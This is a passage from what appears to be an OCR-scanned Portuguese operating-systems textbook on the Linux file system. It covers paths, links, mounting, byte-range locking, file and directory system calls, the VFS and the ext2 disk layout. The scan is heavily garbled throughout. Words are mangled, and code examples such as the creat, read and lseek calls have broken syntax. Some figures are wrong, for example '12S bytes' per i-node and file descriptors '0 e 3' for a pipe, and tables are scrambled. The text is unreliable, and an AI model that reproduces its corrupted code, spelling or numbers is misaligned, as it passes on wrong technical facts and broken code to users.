ka I ho. Assim, os nomes de caminho tambćm podem ser 
definidos em relaęao a o diretório de trabalho. Um nome 
de caminho especifi ca do de modo relativo a o diretório 
de trabalho e um caminho relativo. Por exemplo, se 
Imrłastfbóoksimos3 e o diretório de trabalho, eniao o co 
mando do shell 

cp chap-10 backup-10 

tern exatamente o mesmo efeito que o comando completo 

cp /usr/ast/books/mos3/chap -10 /usr/ast/books/mos3/ 

backup-10 

Frequentemente um usuario predsa referenciar um 
arquivo que pertence a outro u su ario ou que, pelo menos, 
esta localizado em outra parte da arvore de arquivos. Por 
exemplo, se dois usuarios estiverem compartilhando um 
arquivo, o usuario em qucsiao estara localizado em um di¬ 
retório pmencente a u ni deles e, com isso, o outro usuario 
lera de usar um nome de caminho absolut o para referen- 
cia-lo (ou trocar o diretório de trabalho). Se o caminho e 
muito grandę, talvez se tome irritante digiia-lo constante- 
menic. O Linux forncce unia soluęao para csse problema 
ao permitir quc os usuarios faęam urna nova entrada cm 
scu diretório quc apontc para um arqiiivo existcmc. Essa 
entrada e cha mada dc ligaęao {link}* 

Como exemplo, considere a situaęao da Figura 
]0,ló(a). Fred e Lisa estao trabalhandojuntos em um pro- 
jeto e ca da um predsa dc acesso freqttcnfe aos arquivos do 
outro. Sc Fred tem /im/fred como scu diretório dc trabalho, 
ele pode referenciar o arquivoxno diretório de Lisa usali¬ 
do /usr/li$a/x. Como akemativa, Fred pode criar urna nova 
entrada em seu direiório, como rnosira a Figura 10.1ó(b), 
permitindo usar apenas x para indicar fu$rłlmfx. 
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(a) 


(b) 


I Figura 10,16 (a) Antes da ligaęao, (b) Após a ligaęaa 


No exemplo que acabanios cle discutir, sugerimos que, 
antes da ligaęao, a linica maneira de Fred referendar o ar- 
quivo x de Lisa era usando sen caminho absoluto. Na reali- 
dade, isso na o e total menie verdade. Quando um diretório e 
criado, duas enira das,. c sao inseridas automaticameme. 

A prinięira se refere ao próprio diretório de trabalho. A 
segunda, ao diretório-pai do diretório em questao, ista e, o 
diretório anterior no qual o diretório em questao aparece 
re la do na do. Assim, a parter de /usrffred, um outro caminho 
para o arquivo a dc Lisa ć Jlmfx* 

Alem dos arquivos regulares, o Linux tambem da su- 
porte a os arquivos espedais de caracteres e de blocos. Os 
arquivos espedais dc caracteres sao usados para modclar os 
disposifivos de E/S seria is, como os te da d os e as impresso- 
ras. Abrir e ler o arquivo /dev/tfy possibilita a leitura real do 
tedado; abrir c esctever no arqulvo /dev/lp permiie a cscrita 
real na impressora. Os arquivos espedais de blocos, muitas 
vczes com nomes como /dev/hdl f podcm ser usados para a 
leitura t escrila em partięóes do disco cm modo brmo sem 
considerar o sistema de arquivos. Assim, um posicionamen- 
to no byle k, seguido por urna leitura, permitira uma leitura 
do £-esimo by te da partięao correspondente, ignorando por 
completo a estratura do arquivo e do i-nodc. Os dispositwos 
dc blocos cm modo bruto sao usados para paginaęao c tracą 
dc processos por prógramas quc criam sistemas de arquivos 
(por exemp!o, mkfs ) e por programas que resolvem próbie- 
mas nos sistemas de arqiuvos (por exemplc \fsck). 

Muitos computadores tem dois ou mais discos. Nos 
computadores de grandę porte que existem nos bancos, 
por excmplo H tost u ma haver ccm discos ou mais em inna 
mesma maąuina para a rm a ze nar a grandę ąuantidade de 
bases de dados ncccssarias. Mesmo em computadores pes- 
soais, existem pele menos dois discos: um disco rfgido e 
urna unidade de disco flexfvel. Quando existem vartos dts- 
positiyos de disco, e importante saber como trata-los. 

Uma soluęao c usar um sistema dc arquivos indepen- 
dente cm cada um c simplesmente manier todos separa- 


dos. Considere, por exemplo, a situaęao apresentada na 
Figura 10.17(a), Nda i cni os um disco rfgido, que chama- 
remos de C\ e um DVD, que chamaremos de D, Cada 
um tem seus próprios arquivos e diretório-rai z. Com essa 
soluęao, o usuario deve especificar tamo o dispositivo 
quanto o arquivo quando qualquer outro dispositivo di- 
ferente do pa dra o e necessario, Por exemplo, para copiar 
o arquivo a - no diretório d (supondo que C: seja o pa dra o) 
alguem deveria digitar 

cp D:/x /a/d/x 

Essa e a esirategia empregada em sistemas como o MS¬ 
-DOS, o Windows 9S e o VMS. 

A soluęao do Linux e permitir quc um disco seja mon- 
tado cm uma arvorc dc arquivos dc outro disco. Em nosso 
excmp]o, podemos montar o DVD no diretório ib t oblendo 
o sistema de arqiiivos da Figura I0.17{b). O usuario agora 
ve uma unica arvore de arquivos e nao precisa estar cienie 
de qual arquivo reside cm qual dispositivo. O comando de 
cópia anterior pode, entao, ser 

cp /b/x /a/d/x 

exala nieme o mesmo que seria se tu do estivesse no disco 
rfgido no primeiro higar. 

Outra propriedade mtere ssanie do sistema de arquivos 
da Li nu x ć o travamento (hckmg). Em algumas aplicaęóes, 
dois o u mais processos podcm estar usando o mesmo arquivo 
ao mesmo tempo, o quc ć capaz dc gerar condięócs de corri¬ 
da. Uma soluęao e programar a aplicaęao com regioes criticas. 
Contudo, se os processos pertencem a usuarios indepen- 
dcnles que nem sempre conhecem uns aos out ras, esse 
tipo de coordenaęao t em geral inconyeniente, 

Considere, por exemplo, uma base de dados com miii* 
los arquivos em um ou mais diretórios accssados por usua¬ 
rios nao rei a clona dos. Certa nieme c possivel associar um 
semafora a cada diretório ou arquivo c implementar a cx- 
clusao mutua, dcvcndo os processos cxetutar uma opera- 
ęao down sobie o semafora apropriado antes de acessar os 
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1 Figura 10,17 (a) S istem as de arq u i vos separados. (b) Após amo ntage m. 


dadós. A desvantagem, porem, e que o arquivo ou o dirc- 
tório lodo fi ca impedido, mesmo que sonie nic urn registro 
dcva ser acessado. 

Por essa razao, o P0SJX fornece um mecanismo Hcxf- 
vcl c de granula rida de fi na para que os processos usem 
travas tao peąucnas ąuanto para um unie o byte e tao gran- 
des quanto um arquivo i metro em urna operami o indmsi- 
vcK O mecanismo de irava reąuer que o chamador especi- 
fique o cirquivo a ser accssado, o byle inidal e o mimem de 
bytes seguimes* Se a opera pa o ć bcm-sucedida, o sistema 
cria urna cmrada na tabela e a nota que os bytes em questao 
(isto e, um registro da base de dados) estao itnpedidos de 
serem acessados por outros processos, 

Dois lipos de travas sao fornecidas: travas comparti- 
Ihadas c travas exdusivas, Se urna parie de determuiado 
arquivo ja contem unia irava compartilhada, e permitida 
unia segunda tentatiwa de colocar nde inna lrava compar- 
trlhada, mas unia tentaliva de colocar unia trava cxdusiva 


nao e ateiia. Se uma poręao de um arquivo eonie ni urna 
irava exclusiva, lodas as tenlatlvas seguimes para travar 
qualquer parie daquela poręao falharao a te que a nava 
seja liberada. Para que uma rrava seja posicionada com su- 
cesso, todos os byies da regiao a ser travada devem estar 
dispomvds. 

Para posicionar uma irava, urn proccsso dcve especi- 
E i ca r se cle qucr ser bloąueado on nao, no caso de a trava 
falhar. Se de escolhe ser bloąueado, quando existente e re- 
movida, o proccsso solicitante e desbloąueado e sen trava- 
menlo e efetivado. Se o proccsso escolhe nao ser bloąuea¬ 
do durarUe a falha cle sua solidtaęao de trava, a chamada 
de sistema retoma imcdiatamenie, com o código de status 
informando sc a operaęao fot ou nao bem-sucedkla. Sc nao 
fol o chamador tern de decklir o que fazer (por excmplo H 
esperar e tentar nowamente}* 

As regioes tra wadas podem ser sobrepostas* Na Figura 
10.18(a}, vemos que o proccsso A coloea urna irava com- 
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I Figura 10,18 (a) Um arq.uivo com uma trawa, (b) Acrescimo de outra trawa, (o) Uma terceira trawa. 
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partilhado nos bytes de 4 a 7 de alguni arquivo. Em segui- 
da, o processo B coloca unia trava compartilhada nos bytes 
de 6 a 9, como mostra a Figura 10.I8(b). Por firn, C impecie 
os bytes de 2 a 11. Como lodas essas iravas sao compaui- 
thadas, das pudem cocxistir. 

Agora cousidere o que a eon tece se um processo renta 
adquirir u ma rrava exclusiva para o by te 9 do arquivo da 
Figura 10.1S(c}, com u ma solicitaęao para ser bloqueado 
no caso dc fal ha. Vlsio que os dois impedimentos ameriores 
cobrem esse błoto, o chama doi e bloąueado e pcmianecc 
as sini atć que ambos, B c C, ti berem suas travas, 

10.6.21 Chamadas de sistema de arquivos 
no Linux 

Muitas chamadas de sistema sao rełacionadas a arqui- 
vos e ao sistema de arqu]vos, Primeiro, veremos as dia- 
madas de sistema que operam sobre arquivos iodWiduais, 
Em seguida, examinaremos as quc cnvolvem diretórios ou 
o sistema de arquivos como um lodo. Para ciiar um novo 
arquivo, ć possfvd empręgar a cbamada creat. (Certa vcz, 
quando Ken Thompson foi ąuestionado sobre o que faria 
diferente se livesse a oporninidade dc reirweniar o UN1X, 
de responden que cscreveria creat como create dessa vcz*) 
Os para metros forneccm o nome do arquivo e o modo tle 
proteęao. Assim, 

fd - creatfabę”, modę); 

cria um arquivo chamado abc com os tńis de proteęao obii- 
dos de modę, Esses bits determinam quais usuarios podcm 
acessor o arquivo c como isso pode ser feito. Eles sao des- 
critos mais adiante. 

A cbamada creat, alem dc eriar um novo arquivo, tam- 
bem o abrc para escriia, A firn dc permitir que novas cha¬ 
ma das de sistema acessem o arquivo f urna chama da creat 


bem-sucedida retor na como resultado um peąueno nii me¬ 
ro inieiro nao negativo chamado deseritor de arquivo — 
fd no exemplo an tenor. Se unia cha ma da creat e fcita sobre 
um arqtiivo cxistentc, o referido arquivo tem sen tamanho 
zerado e scu conteudo e descartado, 

Vamos agora eontinuar abordando as principais cha- 
mados de sistema de arquivos P apresentadas na Tabela 10.9. 
Para kr dc um arquivo cxistciite ou escrever nde, o arqui- 
vo deve primeiro ser aberto usando open, Essa cbamada cs- 
pecifica o nome do arquivo a ser aberto e como cle devc ser 
aberto: para leitura, escrita ou ambos. Varias opęoes tam- 
bem podem ser especificadas. Como creat a cbamada para 
open retorna um descritor de arquivo que pode ser usado 
para a leitura ou escrita, Em seguida, o arquivo pode ser 
fechado por mcio dc close, quc deixa o descritor dc arquivo 
disporuyd para reulilizaęao nas operaędes subsequentes de 
creat o u open. Tamo a cbamada cneat quanto a open sempre 
ret omam o inenor descritor de arquivo numerado que nao 
esteja atualnieme etn uso. 

Ouando um pr ogra ma inicia sna execuęao de modo 
pa dra o, os descritores de arquivos 0, l e 2 ja estao aberios 
e assodados a en t rada-pa dra o, a saida-padrao e ao erro- 
-padrao, respectivamente. Dessa maneira, um fi liro, como 
o programa sorU pode simplesmente lei sua entrada do des¬ 
critor de arqt]ivo 0 e escrever su a smda para o descritor 
de arquivo I, sem se preocupar cm saber quais sao esses 
arquivos. Essc mecamsmo fundona porąuc o shdl faz com 
que esses valores referenciem os arquivos corretos (redire- 
cionados) autes dc o programa inidalizar, 

As chamadas mais usadas sao, sem duvida, read c write. 
Gada unia tem ires parametros: um descritor de arquivo 
(dizendo quais arqmvos aberios devem ser lidos ou escri- 
tos), um endereęo de b uff er (quc i n forma onde colocar 
ou obter o dado) e um contador (dizendo quantos bytes 


Cha mada de sistema 

Descrięao 

fd = creat{nome P modo) 

U ma maneira de criar utn novo arquivo 

fd - open(arquivo, como, 

Abre um arquivo para leitura, escrita ou ambos 

s = close(fd); 

Fecha um arquivo aberto 

n = read(fd P buffer, nbytes) 

Le dados de um arquivo para um buffer 

n - write(fd p buffer, nbytes) 

Escreve dados de um buffer para um arquivo 

posięao = Iseekffd, deslocamento, de-onde) 

Move o ponteiro do arquivo 

s = stat(nome, &buf) 

Obtem a informaęao de estado do arquivo 

s - fstatffd, &buf) 

Obtem a informaęao de estado do arquivo 

s = pipe(&fd[0]) 

Gria um pipę 

s = fcntl(fd, comando,...) 

Trava de arquivo e out ras operaęoes 


I Tabela 10.9 Alg u mas chamadas de sistema rełacionadas a arquivos. O código de retorno se-1 se ocorrer algum erro; fd e um 
descritor de arquivo e position 4 um offset de arquiva Os parametros sao autoej<plicativos. 
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transferir). Isso e rudo — e um projeto mu i to simples. Urna 
chama da tfpica e 

n = neadffd, buffer, nbytes); 

Einbora a maioria dos programas leia c escreva nos 
arquivos sequenrialmente, alguns programas predsam 
acessar panes aleatórias de um arquivo. Associado a cada 
arquivo existe um ponteiro que indica a posięao atual 
do arqmvo + Dura nie Icituras (ou escritas) seąuendais, de 
norma I menie apoma para o p rodni o by te a ser lido (ou 
escrito), Sc o ponteiro csia, digamos, na posila o 4096, an- 
tes que 1.024 bytcs sejam Lidos, de a m oma Li ca men te sera 
movido para 5120, após urna cha ma da de sisiema read bem- 
-sucedida. A chaniada Iseekaliera o vaior do ponteiro atual, 
de modo que as diamadas subseąuenles a read ou wrrte 
possani comeęar em qualquer lugar do arquivo, ou mesmo 
alćm do firn dde. Ela ć cha mada Iseek para cvkar confusao 
com seek, u ma cha mada agora obsołeta inidalmente usada 
para posidonamenlos em eomputadores dc 16 bits. 

Lseek possui tres parametros: o primeiro e o descritor 
de arquivo para o arquivo; o segundo e a posięao do arqui- 
vo; o tercciro dizse a posięao do arquivo e relativa ao inicio 
do arquivo, a posięao atual ou ao firn do arquivo, O valor 
retornado por Is&ek e a posięao absoluta no arquivo após o 
ponteiro do arquivo ter sido a 1 tera do. Ironicamenlc, lseek e 
a unica cha mada dc sistema de arquivos quc nunca ca usa 
um acesso real ao disco, pois tudo o quc da faz e atualizar 
a posięao atual do arquivo, que na verdade se trata de um 
nu mero na memória. 

Para cada arquivo ( o Linux mantem o controle do 
modo do arquivo (regular diretório, arquivo especial), 
tamanho, hora da ultima modificaęao e outras informa- 
ęóes. Os programas podem solicitar essas informaęoes pela 
chama da dc sistema stat. o primeiro para metro e o nonie 
do arquivo. O segundo e um ponteiro para urna estru tura 
oj ule a informaęaosolidta da deve ser cołocada. Os campos 
da estrutura sao mostrados na Tabela 10.10. A chamada 


Dispositivo do arquivo 

Numero do i-node (qual arquivo do dispositivo) 
Modo do arquivo (inclui informaęao de proteęao) 
Nu mero de ligaęóes para o arquivo 
Identificaęao do proprietario do arquivo 
Grupo ao quai pertence o arquivo 
Tamanho do arquivo (em bytes) 

Hora da crtaęao 
Hora do ultimo acesso 
Hora da Oki ma nnodff icaęao 

I Tabela 10.10 Os campos netornados pela chamada de 
sistema stetf. 


fstat e a mesma de siat, exceto pelo lato de que opera sobre 
um arquivo aberto (cujo nonie pode nao ser conherido) 
em vez de operar sobre o nonie do caminho, 

A chaniada de sistema pipę e usada para criar pipelines 
no shell. Essa chamada cria um lipo de pseudoarqiiivo, que 
armaze na t eniporariamente os da dos entre os componentes 
do pipeline e ret orna os descritores de arquivos tanio para 
leitura quanto para escrita no buffer* Em u ni pipeline como 

sort <in | head -30 

o descritor de arquivo 1 (saida-padrao) no processo em 
execuęao sort deve ser ajustado (pelo shctl) para escrita 
no pipę, e o descritor dc arquivo 0 (enirada-padrao) no 
processo em exeaięao head deve ser ajustado para leitura 
do pipę. Dessa maneira, sort simplesmente le a parlir do 
descritor de arquivo 0 (conńgurado para o arqulvo in) e 
escreve no descritor de arqthvo I (o pipę) sem saber que 
os descritores estao redirectonados, Se os descritores nao 
sao redire ci ona dos r sort automaticamentc lera do tcclado 
e escrevera no terminal (dlspositiyos-padrao). Da mesma 
maneira, quando head le a partii do descritor de arquivo 0, 
ek le os da dos que sort coloca no bu ffer do pipę sem saber 
que um pipę esia sendo tisado. Esse e um nitido exemplo 
de um coneeito simples (redl redo na men to), com urna i ni¬ 
pie men taęa o simples (descritores de arquivos 0 e 3), que 
lcva a uma ferramenta poderosa (concxao dc programas 
em modosarbiirariossem a nccessidade de modilicados). 

A ultima chamada de sistema na Tabela 10.9 e fcntL Ela 
e usada para impedir ou liberar o acesso a arquivos f exccu- 
tando alg u mas operaęoes espedficas de arquivos. 

Agora vamos analisar alguinas chamadas de sistema 
relacionadas mais a direiórios ou ao sistema de arquivos 
como um todo, em vez de somente a um arquivo especifi- 
co. Algumas diamadas comiins sao apresentadas na Tabela 
10,1 L Os direiórios sao criados e destrufdos u san do mkdir e 
irndir, rcspectivamcntc. Um diretório só pode ser rcmovido 
sc estivcr vazio. 

Como vimos na Figura 10,16, uma ligaęao para um 
arquivo cria uma nova entrada no diretório que apoma 
para um arquivo ja existente, A chamada de sistema link 
cria essa ligaęao. Os parametros especificam os nornes ori- 
ginal c novo, respectivamcnte. As entradas no diretório sao 
removidas com unlink. Quando a ultima ligaęao e renuwida, 
o arquivo e aut oma lica men te apagado, Para um arquivo 
que nao foi liga do, a primeira execuęao de unlink jci apaga 
o arquivo. 

O diretório de trabalho e altcrado pela chamada de sis- 
tema chdir. Essa aęao tem o efeito de trocar a imerpretaęao 
dos nomes de camuihos rclativosH 

As liltimas quairo diamadas da Tabela 10.11 sao para 
a leitura de direiórios, que podem ser abenos, fechados e 
lidos, de maneira analoga aosarquivos comuns, Cada cha¬ 
mada readdir ret orna cxatamente uma entrada do diretório 
em um formatu fixo. Nao ha como os u su a nos escreverem em 
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Chamada de sistema 

Descrięao 

$ = mkdirfcaminho, modo) 

Cria um novo diretório 

s = rmdir(caminho) 

Remove um diretório 

$ - link(caminho velho, caminho novo) 

Cria uma ligaęao para um arquivo 

s = unlink(caminho) 

Remo(ve a ligaęao para um arqutvo 

s - chdirfcaminho) 

Troca o diretório atual 

dir = opendir(caminho) 

Abre um diretório para leitura 

s = closedir(dir) 

Fecha um diretório 

entradir = readdir(dir) 

Le urna entrada do diretório 

rewinddir(dir) 

Rebobina um diretório de modo que ele possa ser lido novamente 


Tabela 10.11 Algumas chamadas de sistema refacionadas a diretórtos. O código de retorno s e -1 se ocorrer algum erro; dir 
identifica urna cadeia de diretórios e entradir e u ma entrada de diretório. Os param etros sao autoexplicativos. 


u ni diretório (para manier a mtegridade do sistema de ar- 
quivos). Arquivos poderti ser adicionados a urn diretório 
usando creat ou link e removidos usando unlink. Tambem nao 
lia como posirionar seek em nm arquivo especffico de um 
diretório, embora rewinddirpermita que um diretório aberto 
seja lido nova menie des de o mfdo. 

_ 10.6.31 Implementaęao do sistema de 

arquivo$ do Linux 

Nesta seęao, descreveremos prirneiro as abstiaęóes Idr- 
necidas pela ca ma da do sistema de arquivos virtual (virtual 
file system — VFS)> 0 VFS esconde dos processos e aplica- 
ęóes dc nfvel mars alto as difcrenęas entre os muitos ti- 
pos dc sistemas dc arquivos que fundonam pclo Linux, 
independentemente dc residirem nos disposilivos locais 
ou estarem armazenados remoiamcnte e precisarem ser 
acessados na rede. Disposilivos e outros arquivos espectais 
tambem sao acessados via ca ma da VFS. Descreveremos 
tambem a implementaęao do prirneiro sistema de arquivos 
do ljmix amplamente distribuido, o ext2 ou o segundo 
sistema de arquivos estendido. Por firn, disculiremos as 
melhorias no sistema ext3. Yarios outros sistemas dc arqui- 
vos tambem estao cm uso, Todos os sistemas Linux podcm 
tralar varias partięócs do disco, cada urna com um sistema 
de arquivos diferente nela. 


O sistema de arqurvos virtual do Lmu>£ 

Para permitir que as aplicaęoes interajam com diferen- 
tes sistemas de arquivos, implememados em diferentes ti- 
pos de disposiiivos locais ou remotos, o Linux adota u ma 
abordagem ntilizada em outros sistemas UN1X: a do sistema 
de arquivos virtual (VFS). O VF$ define um conjunto de 
abstraęoes basicas do sistema de arquivos e as operaęoes 
quc sao pennitidas nessas abstraęoes. As invocaęóes das 
cbamadas de sistema descrilas na seęao anierior acessam 
as estru tu ras de dados do VF$, determinant o sistema de 
arquivos exato ao qual pertenee o arquivo accssado e, via 
ponieiros de funęao armazenados nas estruturas de dados 
do VFS> invocam a opcraęao correspondentc no sistema de 
arquivos especffico. 

A Tabela 10.12 resume as qnatro estruturas prindpais 
de sistemas de arqu!vos suportadas pelo VFS. O super- 
bloco coniem informaęóes criticas sobi e a organizaęao do 
sistema dc arąuiyos. A dcstruięao do supcrbloco ddxara 
o sistema de arquivos inacessivd. Cada um dos i-nodes 
(abreviaęao de index-ttode f mas mrnca cha mado dessa for¬ 
ma — embora alguns preguięosos tirem o hffen e os deno- 
minem i-nodes) descreve exatamente um arquivo. Obser- 
ve que, no Linux, os diretórios e dispositivos tambem sao 
represemados por arquivos e, assim, terać i-nodes a ełes 
corrcspondentcs. Tanio os supcrblocos quanto os i-nodes 


Objęto 

Descrięao 

Operaęlo 

Superbloco 

Sistema de arquivos especifico 

read inode, synejs 

Dentry 

Enlrada de diretório, componenle unico de um caminho 

create a link 

i-node 

Arquivo especifico 

d^compare, d„deiete 

Arquivo 

Arquivo aberto associado a um processo 

read, write 


I Tabela 10.12 Abstraęóes de sistemas de arquivos fornecidos pelo VFS. 
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possuetn unia estrutura correspondente mantida no disco 
ffsico onde o sistema de arquivos reskie. 

De modo a facilitar ccrlas operaęoes de diretórios e ca- 
minlios transversais, como usr/ast/bin, o VFS da suporte a 
u ma estrutura de dados dentry que represema urna en- 
trada de diretório. Hssa estrmura de dados e criada dinami- 
cameme pelo sistema de arquivos. As emradas de diretório 
sao armazenadas em urna ca che de nom i na da dennyjcache — 
que poderia, por exemplo, conter emradas para 4 Jusr, / 
usr/asi etc. Se multiplos processos acessam o mesmo arqui- 
vo por intemiedio da mesrna ligała o estrita (o mesmo ta¬ 
rnin ho, por exemplo), sen arquivo objęto apontara para a 
mesma entrada nessa cachc. 

Por firn, a estru tura de dados arquivo e uma repre- 
sentaęao na memória de om arquivo aberto e e triada em 
re spoista a chamada de sistema open, Essa estru tura da su- 
porte as operaęóes tomo read, write, sendfife, iock e outras 
chama das dcstritas na seęao anterior 

O sistema de arquivos real, implemetitado abaixo do 
VFS, nao precisa utilizar exatameme as mesmas ahstraęoes 
e operaęoes interna menie. Entretanlo, eles devem imple- 
mentar operaęoes de sistemas de arquivos semanticameme 
semelhantes aqueias espedficadas pelos objetos VFS. Os 
element os das estru taras de dados operaęoes para cada urn 
dos quatro objetos VF5 sao ponteiros para fimęóes no siste¬ 
ma de arquivos subjaccntc. 

O sistema de arquivos ext2 do Liiuut 

A seguir, descrcveremos o sistema de arquivos em 
disco mais popular no Linux: o ext2, A primeira versao 
do Linux distribuida usava o sistema dc arquivos do MI- 
NIX e impunha rcsirięoes como nomes dc arquivos cunos 
e tamanho maximo de 64 MB. O sistema de arquivos do 
MIN1X acabou sendo snbstimido pelo primeira sistema de 
arquivos estendido, ext f qne permitia nomes mais longos 
e arquivos maiores. Por tonta de ineficiendas em sen dc- 
sempenho, o ext fol substitufdo por seu sucessor, ext2 r que 
ainda e largamente utilizado. 

No Liniiuma partięao de disco ext2 tomem um sis¬ 
tema de arquivos tom a organizaęao mostrada na Figura 
10.19. O bloco 0 nao e utiiizado pelo Linux e frequen- 
temente tomem código para a inidalizaęao do sistema. 
Dcpois dele, a partięao c dividida em grupos de blocos, 
sem que exista prcocupaęao com a localizaęao das fron- 


teiras de ciiindros do disco. A organizaęao de cada grupo 
e descrita a seguir. 

O terceiro bloco c o su p erb loco. Ele contem i nforma- 
ęoes sobre a organizaęao do sistema de arquivos, incluindo 
o nu mero de i-nodes, de blocos do disco e o inicio da lista 
de blocos livres (que normalnienie contem algumas cenie- 
nas de emradas). Em seguida aparece o descritor de grupo, 
que contem informaęóes sobre a localizaęao dos mapas de 
bits, o mimem de blocos livres e o nuniero dos diretórios 
no grupo. Essa informaęao e importante, pois o ext2 tenta 
espalhar de forma cquilibrada os diretórios no disco, 

Dois mapas de bits eontrolani os blocos e i-nodes livres, 
respeclivamente, uma escollia herdada do sistema dearąui- 
vos do MINIX (difereniememe de muitas versoes do UNIX, 
que u sam uma lista de blocos llvres). Cada mapa ot u pa um 
bloco. Com blocos de 1 KB, essa organizaęao limita o grupo 
a 8,192 blocos e S.192 i-oodes, A restrięao quanto aos blocos 
c relevante na pratica, mas a de i-nodes, nao, 

Depois do superblcco estao os i-nodes mmierados de 1 
ate um maximo. Cada i-node ocupa 12S bytes e descreve 
exatameme urn arquivo. Um i-node contem informaęóes 
sobre contabilidade {indusive todas as informaęóes retor- 
nadas por ślat — que siniplesmente as obtem do i-node), 
assirn como informaęóes suficientes para localizar todos os 
blocos do disco quc armazenam dados de arquivo. 

Após os i-nodes esLao os blocos de dados, onde estao 
amtazenados todos os arquivos e diretórios. Se um arqułvo 
ou diretório ocupar mais de um bloco, nao ha necessidade 
cle os blocos ocupados serem contfguos. Na verdade, e mni- 
to provavel que os blocos de um arquivo grandę estejam 
espa Iliad os pelo disco. 

Os i-nodes qne correspondem a diretórios estao espalha- 
dos pdos grupos de blocos do disco. Quando ha espaęo 
suficiente, o exi2 lenta agrupar os arquivos comuns no 
mesmo grupo de blocos que o diretório pai, e os arquivos 
de dados no mesmo bloco do arquivo i-node originah Essa 
idcia baseia-se no Fast Fik System da Berkeley (McKusiek 
et al., 1984). Os mapas de bits sao usados na tornada rapi- 
da de decisoes com relaęao a alocaęao de novos dados do 
sistema de arquivos. Ouando novos blocos de dados sao 
alocados, o ext2 tambem pre-aloca (oito) blocos adidonais 
para aqudc arquivo, de forma a minimizar a fragmentaęao 
do arquivo causada por futuras operaęoes de escrita. Esse 
esquema equilibra a carga do sistema de arquivos por todo 


inicializaęao 

Grupo de blocos 0 

Grupo do bEoccs 1 

Grupo de blocos 2 

Grupo de blocos 3 

Grupo de blocos 4 








- 

Superbloco 

Descritor 
do grupo 

Mapa de bits 
do bloco 

Mapa do bits 
do i modę 

i-nodes 

Blocos de dados 

__a_ 


I Figura 10.19 Organizaęao de disco do sistema de arquivos ext2 do Unux. 
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o disco e tambeni apresema bom desempenho eni virtude 
das tendencias a colocaęao e a reduęao da fragmentaęao. 

Para acessar um arąuiyo, ełe deve primeiro usar uma 
das chamadas de sistema do Linux — como open, que requer 
o caminho para o arquivo. O caminho deve ser fragmen- 
tado de forma a permitir a extraęao dos nomes indmduais 
dos direLórios. Caso seja espedfkado um caminho rdativo, 
a busca se inida no diretório atual do processo; caso eontra¬ 
iło, a busca comcęa pelo diretório-raiz. Em ambos os casos, 
o i-no de para o primeiro diretório pode ser fa dl men te loca- 
lizado: existe um ponieiro para ele no descritor do processo 
ou, no caso do diretório-raiz, de geralmcnte e amiazenado 
em um bloco predeterminado do disco. 

O arquivo dc diretórios permite nomes dc ate 255 ca- 
racteres e e apresentado na Figura 10.20. Cada diretório e 
composto por algum nu mero integral de blocos de disco, de 
forma que os diretórios possani ser atomicamenie escritos 
no disco. Em um diretório, as entradas para arquivos e di¬ 
retórios nao estao organizadas e cada entrada segue direta- 
mente sua antecessóra, As entradas nao podem ultrapassar 
os blocos dc disco e, por isso, nor mai men tc cxistcm alguns 
bytes nao uiilizados ao finał de cada bloco de disco. 

Cada entrada de diretório na Figura 10.20 e forma da 
por ąuairo campos de tamanho Fixo e um de ta man ho va- 
riavel O primeiro campo e o numero do i-node — 19 para 
o arquivo cobssal 42 para oarquivo extemo e 88 para o dire- 
lório bigdir. Em seguida aparece o campo recjen, que infor¬ 
ma o tamanho da entrada em bytes e possivelmeme inclui 
algum espaęo depois do nome, Essc campo c necessario 
para a localizaęao da próxima entrada no caso de o nonie 
do arquivo estar acrescido de um tamanho desconhecido. 
fi isso que sigmifka a scia na Figura 10.20. A seguir surge o 
campo lipo, quc pode ser arquivo, diretório etc O ultimo 
campo de tamanho fixo ć o tamanho do nonie reał do ar- 
quivo em bytes — 8, 7 e ó nesse exemplo. Finalmente, vem 
o nonie do arquivo em si P qne termina com um byte 0 e se 


expande ate uma fromeira de 32 bits. Pode ser que exista 
um espaęaniento adidonal depois desie. 

Ma Figura 10.20(b), vcmos o mesmo diretório após a 
cxdusao do arquivo extemo . O quc vemos ć o aumento do 
campo de entrada para cobssal e a transformata o do anti- 
go campo para o arquivo menso em espaęaniento para a 
primeira entrada. fi claro que esse espaęamento pode ser 
utilizado em uma futura entrada. 

Como a busca nos diretórios e feita iinearmente, pode- 
-se levar muito tempo ate encontrar uma entrada no fi¬ 
nał de um diretório muito extenso, Assirn sondo, o sistema 
mantem urna cache de diretórios recen te nieme acessados. 
A busca na cache e feita utilizando nome do arquivo quc, 
se en eon trąd o, faz com que uma custosa busca linear seja 
economizada. Um objęto dentry e colo ca do na cache dentry 
para cada element o do caminho do arquivo ate que sc aJ- 
cance o i-node do arquivo atual 

A procura de um nome de caminho absoluto, como 
/u$r/mt/file f en glob a uma serie de eta pas. Primeiro, o siste¬ 
ma localiza o diretório-raiz, que geralmcnte usa o i-node 
2, principalmcnte quando o i-node l esta reservado para 
o tratamento de blocos danificados. Ele insere uma entra¬ 
da na cache dentry para futuras buscasdo diretório-raiz. Em 
seguida, ek procura a cadeia 'usri no diretório-raiz, a firn de 
obter o numero do i-node do diretório tusr, o qual lam- 
bcm e inserido na cache dentry. Essc i-nodc e enlao bus¬ 
ca do e os blocos do disco sao extraidos dele, de modo que 
o diretório Imr pode ser lido e pesąuisado para a cadeia 
'ast\ Uma vcz quc cssa entrada e encontrada, o mi mero 
do i-node para o diretório fusrhm pode ser obtido dda* 
De posse do numero do i-node do diretório fusrfast, essc 
i-node pode ser lido e os blocos do diretório sao passfyeis 
de localizaęao. Por lim, 'file' e procurado e o numero de 
seu i-node encomrado. Assinr o uso dc um nome dc ea- 
rninho re!ativo nao só e mais conveniente para o usuario, 
como lambem eeonomiza uma quanlidade substancial de 
trabalho do sistema. 



I Figura 10.20 (a) Um diretório no Linux com tf§s arquivos. {bj O mesmo diretório após a excfusao do arquivo extenso. 
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Se o arquivo esta preseme, o sistema extrai o numero 
do i-noile e o usa como urn fndice da tabela de i-nodes 
{no disco) para iocalizar o i-node correspondente e traze- 
-lo para a memoria. 0 i-node ć colocado na tabela de i* 
-nodes uma estru tura de dados do nucleo que contem to- 
dos os i-nodes para os arquivos e os dimórios abertos nesse 
momento. O fermato das entradas i-node deve eon ten no 
mfnimo, todos os carnpos re tornad os pela cha mada de sis- 
tema stat para que essa ehaniada fundone <veja a Tabela 
10,10)< Na Tabela 10 J3 mosiramos algutis dos carnpos pre- 
semes na estru tura dc i-nodes su por lada pcia camada de 
sistema de arquivos do Linux> Na verdade, essa estrutura 
contem muitos outros carnpos, ja quc tambem e utiiizada 
para representar diretórios, dispositivos c outros arquivos 
cspcciais. A estrutura de i-nodes tambem contem carnpos 
